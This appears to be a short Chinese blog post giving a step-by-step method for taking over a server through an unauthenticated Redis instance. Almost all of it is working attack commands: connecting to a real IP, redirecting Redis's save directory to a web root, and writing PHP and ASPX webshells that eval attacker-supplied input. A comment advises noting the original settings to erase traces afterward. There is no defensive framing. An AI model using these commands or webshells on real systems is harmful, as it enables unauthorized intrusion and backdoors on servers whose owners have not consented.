redis渗透获取权限
KALI
redis-cli -h 189.174.86.173
//运行并复制相关参数,完事了搽屁股
config get dir
config get dbfilename
//开始 设置网站目录 文件名 内容
config set dir E:/www/font
config set dbfilename redis.aspx
set webshell "<?php phpinfo(); ?>"
//php查看信息
set webshell "<?php @eval($_POST['chopper']);?> "
//phpwebshell
set webshell "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>"
// aspx的webshell,注意双引号使用\"
————————————————
save
//查看一下成功没
get webshell
扫描二维码推送至手机访问。
版权声明:本文由Mpg blog发布,如需转载请注明出处。
